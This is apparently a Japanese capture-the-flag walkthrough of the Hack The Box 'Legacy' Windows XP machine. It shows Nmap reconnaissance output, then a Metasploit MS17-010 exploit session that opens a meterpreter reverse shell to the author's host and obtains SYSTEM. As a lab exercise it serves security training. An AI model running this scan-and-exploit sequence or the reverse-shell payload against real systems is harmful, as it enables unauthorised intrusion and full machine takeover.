大まかに
- Nmapスキャン
- Nmap Scriptを用いたスキャン
- Google Search
- MetaSploit
- Get System
1. Nmap Scan
# sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4
# Nmap 7.93 scan initiated Fri May 12 00:52:11 2023 as: nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4
Increasing send delay for 10.10.10.4 from 0 to 5 due to 659 out of 1647 dropped probes since last increase.
Increasing send delay for 10.10.10.4 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.56s latency).
Scanned at 2023-05-12 00:52:11 EDT for 1998s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows XP microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/12%OT=135%CT=1%CU=42068%PV=Y%DS=2%DC=I%G=Y%TM=645DCD
OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS
OS:=0)OPS(O1=M53ANW0NNT00NNS%O2=M53ANW0NNT00NNS%O3=M53ANW0NNT00%O4=M53ANW0N
OS:NT00NNS%O5=M53ANW0NNT00NNS%O6=M53ANNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W
OS:4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y%T=80%W=FAF0%O=M53ANW0NNS%CC=N%Q=)T1(
OS:R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=
OS:%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FAF0%S=O%A=S+%F=AS%O=M53ANW0NNT00NNS%RD=0%Q=
OS:)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h28m19s, deviation: 2h07m16s, median: 4d22h58m19s
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b93c06 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 005056b93c060000000000000000000000
| 0000000000000000000000000000000000
|_ 0000000000000000000000000000
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40600/tcp): CLEAN (Couldn't connect)
| Check 2 (port 60076/tcp): CLEAN (Couldn't connect)
| Check 3 (port 50902/udp): CLEAN (Failed to receive data)
| Check 4 (port 12744/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-05-17T10:23:36+03:00
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 12 01:25:29 2023 -- 1 IP address (1 host up) scanned in 1999.01 seconds
2. Nmap Script Scan
# nmap -p 139,445 -vv -Pn --script=smb-vuln* 10.10.10.4 -oN nmap-smb_enum.log
# Nmap 7.93 scan initiated Fri May 12 01:17:20 2023 as: nmap -p 139,445 -vv -Pn --script=smb-vuln* -oN nmap-smb_enum.log 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received user-set (0.60s latency).
Scanned at 2023-05-12 01:17:20 EDT for 16s
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri May 12 01:17:36 2023 -- 1 IP address (1 host up) scanned in 15.92 seconds
以下の2つがありそうだなっていうのがわかった。
- CVE-2008-4250
- CVE-2017-0143
# 3. Google Search
- Googleで2つのCVEについて調べてみた。
Easyレベルでバッファフローはあまりなさそうなのでこれじゃないと判断。
```
msfconsole -q
msf6 > search MS17-010
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
- show optionsで設定を確認。
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check
ts/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w
rite folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.3.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic
View the full module info with the info, or info -d command.
- setコマンドを使用して「RHOSTS」と「LHOST」を設定する。
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) >
msf6 exploit(windows/smb/ms17_010_psexec) >
msf6 exploit(windows/smb/ms17_010_psexec) >
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.16.8
LHOST => 10.10.16.8
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check
ts/named_pipes.txt
RHOSTS 10.10.10.4 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w
rite folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.8 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic
View the full module info with the info, or info -d command.
- エクスプロイトを実行して、権限を確認{system権限が取れているのでこれでroot/userフラグを取得して終わり)
msf6 exploit(windows/smb/ms17_010_psexec) > run
[] Started reverse TCP handler on 10.10.16.8:4444
[] 10.10.10.4:445 - Target OS: Windows 5.1
[] 10.10.10.4:445 - Filling barrel with fish... done
[] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[] 10.10.10.4:445 - [] Preparing dynamite...
[] 10.10.10.4:445 - [] Trying stick 1 (x86)...Boom!
[] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x861137d0
[] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[] 10.10.10.4:445 - Selecting native target
[] 10.10.10.4:445 - Uploading payload... jWwmzfbo.exe
[] 10.10.10.4:445 - Created \jWwmzfbo.exe...
[+] 10.10.10.4:445 - Service started successfully...
[] Sending stage (175686 bytes) to 10.10.10.4
[] 10.10.10.4:445 - Deleting \jWwmzfbo.exe...
[*] Meterpreter session 1 opened (10.10.16.8:4444 -> 10.10.10.4:1035) at 2023-05-13 02:12:07 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >